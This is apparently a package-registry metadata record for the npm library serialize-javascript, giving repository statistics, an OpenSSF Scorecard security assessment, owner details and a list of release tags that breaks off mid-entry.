{"id":2347999,"name":"serialize-javascript","ecosystem":"npm","description":"Serialize JavaScript to a superset of JSON that includes regular expressions and functions.","homepage":"https://github.com/yahoo/serialize-javascript","licenses":"BSD-3-Clause","normalized_licenses":["BSD-3-Clause"],"repository_url":"https://github.com/yahoo/serialize-javascript","keywords_array":["serialize","serialization","javascript","js","json"],"namespace":null,"versions_count":30,"first_release_published_at":"2014-09-16T16:06:10.211Z","latest_release_published_at":"2026-03-25T14:24:36.784Z","latest_release_number":"7.0.5","last_synced_at":"2026-04-13T16:14:08.533Z","created_at":"2022-04-10T00:31:32.592Z","updated_at":"2026-04-13T16:14:08.534Z","registry_url":"https://www.npmjs.com/package/serialize-javascript","install_command":"npm install serialize-javascript","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"7.0.5"}},"repo_metadata":{"id":20821165,"uuid":"24106944","full_name":"yahoo/serialize-javascript","owner":"yahoo","description":"Serialize JavaScript to a superset of JSON that includes regular expressions and functions.","archived":false,"fork":false,"pushed_at":"2026-03-25T14:24:20.000Z","size":311,"stargazers_count":2920,"open_issues_count":42,"forks_count":206,"subscribers_count":33,"default_branch":"main","last_synced_at":"2026-03-31T19:29:41.737Z","etag":null,"topics":["javascript","json","serialize","web"],"latest_commit_sha":null,"homepage":null,"language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/yahoo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2014-09-16T16:07:16.000Z","updated_at":"2026-03-29T10:50:40.000Z","dependencies_parsed_at":"2026-03-15T18:02:37.037Z","dependency_job_id":null,"html_url":"https://github.com/yahoo/serialize-javascript","commit_stats":{"total_commits":146,"total_committers":29,"mean_commits":"5.0344827586206895","dds":0.7054794520547945,"last_synced_commit":"ca867414d8f54347c0c3edaf4299502c2824b67f"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/yahoo/serialize-javascript","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yahoo","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/sbom","scorecard":{"id":1238763,"data":{"date":"2025-10-06","repo":{"name":"github.com/yahoo/serialize-javascript","commit":"bb0048c18a6aeab397b7ade2b6b8381d4d1f8487"},"scorecard":{"version":"v5.3.1-0.20251003215448-f542d69ba0cd","commit":"f542d69ba0cd01fcff1cc4395b9780f2476af14d"},"score":4.7,"checks":[{"name":"Code-Review","score":5,"reason":"Found 6/11 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":2,"reason":"2 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/test.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/yahoo/serialize-javascript/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/yahoo/serialize-javascript/test.yml/main?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f542d69ba0cd01fcff1cc4395b9780f2476af14d/docs/checks.md#sast"}}]},"last_synced_at":"2025-10-13T21:24:44.054Z","repository_id":20821165,"created_at":"2025-10-13T21:24:44.063Z","updated_at":"2025-10-13T21:24:44.063Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31328307,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-03T02:17:30.558Z","status":"ssl_error","status_checked_at":"2026-04-03T02:17:30.071Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"yahoo","name":"Yahoo","uuid":"16574","kind":"organization","description":"This organization is the home to many of the active open source projects published by engineers at Yahoo Inc.","email":"ospo@yahooinc.com","website":"https://developer.yahoo.com/opensource","location":" We're working from home these days. Stay safe.","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/16574?v=4","repositories_count":204,"last_synced_at":"2024-12-31T07:28:06.423Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/yahoo","funding_links":[],"total_stars":52211,"followers":385,"following":0,"created_at":"2022-11-02T16:20:07.792Z","updated_at":"2024-12-31T07:28:06.423Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yahoo","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yahoo/repositories"},"tags":[{"name":"v7.0.5","sha":"df3f1c1fa9ca16b050ae893cb63ac23c91deed55","kind":"tag","published_at":"2026-03-25T14:23:54.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.5","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.5/manifests"},{"name":"v7.0.4","sha":"eec32e08c5ac51bba2d8042101f6d2622c133110","kind":"tag","published_at":"2026-03-02T23:25:51.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.4","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.4/manifests"},{"name":"v7.0.3","sha":"d50571505a7776191346d714618867455b3354c1","kind":"tag","published_at":"2026-02-27T14:38:13.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.3","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.3/manifests"},{"name":"v7.0.2","sha":"44f544b85a8e2719890a0853184d83c4ecbc9bcb","kind":"tag","published_at":"2025-12-07T13:26:22.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.2","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.2/manifests"},{"name":"v7.0.1","sha":"f7fff15630a450dfcbcb88d33f7dc30b4f1e41f8","kind":"tag","published_at":"2025-11-28T13:30:57.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.1/manifests"},{"name":"v7.0.0","sha":"bb0048c18a6aeab397b7ade2b6b8381d4d1f8487","kind":"tag","published_at":"2025-10-04T12:52:38.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v7.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v7.0.0/manifests"},{"name":"v6.0.2","sha":"b71ec23841d7cf30847d3071d9da38ee0b397fc8","kind":"tag","published_at":"2024-01-09T01:06:22.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v6.0.2","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"7139f9251b4cad52136513cf3360869e1e645d6c","kind":"tag","published_at":"2023-01-15T14:33:32.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v6.0.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"3302c443cd949750d4407a67ab869f8290ea3762","kind":"tag","published_at":"2021-06-21T13:54:27.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v6.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v6.0.0/manifests"},{"name":"v5.0.1","sha":"8eb19aa769b3b144bf8838bce58ac6e8b8ce3cb5","kind":"commit","published_at":"2020-09-10T12:52:36.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v5.0.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"282a3b82e82f2d3bb1e6e9500ad553700d7e4e69","kind":"commit","published_at":"2020-09-09T12:31:54.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v5.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v5.0.0/manifests"},{"name":"v4.0.0","sha":"a8a458c9a98771005d9315f11b4fd6e61373de21","kind":"tag","published_at":"2020-06-08T13:39:29.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v4.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v4.0.0/manifests"},{"name":"v3.1.0","sha":"b54341e3f4be20b415148219767049173f0974d8","kind":"tag","published_at":"2020-05-28T11:36:04.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v3.1.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"f5957ee95b8e7d0d6a52b2185aece0b345aa0492","kind":"tag","published_at":"2020-02-16T13:36:13.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v3.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v3.0.0/manifests"},{"name":"v2.1.2","sha":"6c43b02710bab8ddaf0d86dd2f9602af74ade7fc","kind":"tag","published_at":"2019-12-09T09:19:09.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v2.1.2","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"433fc9cafe375b3f376efd12730b226035c3ee3a","kind":"tag","published_at":"2019-12-05T09:39:51.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v2.1.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"31c98adc21a54f6900f9aa6a415731d1398637c1","kind":"tag","published_at":"2019-09-04T12:32:46.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v2.1.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"c65dd4a3af3c8bf5a94d8c7e4746f0effec0a8ed","kind":"tag","published_at":"2019-09-04T12:08:42.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v2.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v2.0.0/manifests"},{"name":"v1.9.1","sha":"9ee6b1ca1f755594aab026d712f93d34f477b5e9","kind":"tag","published_at":"2019-09-04T12:06:22.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.9.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"84ad59ba37afca17b074388964b641a2424fc089","kind":"tag","published_at":"2019-08-29T12:37:14.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.9.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.9.0/manifests"},{"name":"v1.8.0","sha":"6eae8337d34099a7dde0d18f1584210a7768f14c","kind":"tag","published_at":"2019-08-20T12:50:34.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.8.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"423a382bd5d7f85c46ef395fc2cfde631959da32","kind":"tag","published_at":"2019-04-16T12:18:38.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.7.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.7.0/manifests"},{"name":"v1.6.1","sha":"35f64803a3a67662e16ad5260901d4e291260989","kind":"tag","published_at":"2018-12-28T07:33:43.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.6.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.6.1/manifests"},{"name":"v1.6.0","sha":"8c10244f7bdf31b6052d6d8ded0eb7788809cc20","kind":"tag","published_at":"2018-12-24T14:32:50.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.6.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"1812f25c6267c2f8e7e18639513f27e68e5b648f","kind":"tag","published_at":"2018-04-18T00:04:54.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.5.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.5.0/manifests"},{"name":"v1.4.0","sha":"11fdd024ab3829f1b22d1ea76e4f7671b1f6df22","kind":"tag","published_at":"2017-07-15T12:43:04.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.4.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"457a4c6a04859fddea8dd4ae8422f73ade9da72e","kind":"tag","published_at":"2016-05-31T21:52:27.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.3.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.3.0/manifests"},{"name":"v1.2.0","sha":"c5b0b9379ebbc317f33fee29e770a32ce58fbb6b","kind":"tag","published_at":"2016-02-29T23:35:37.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.2.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"e08289e667ab9a146b5dbabc3c0c3f31095549a3","kind":"tag","published_at":"2015-09-09T16:59:24.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.1.2","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.1.2","manifests_url":"https://repos.e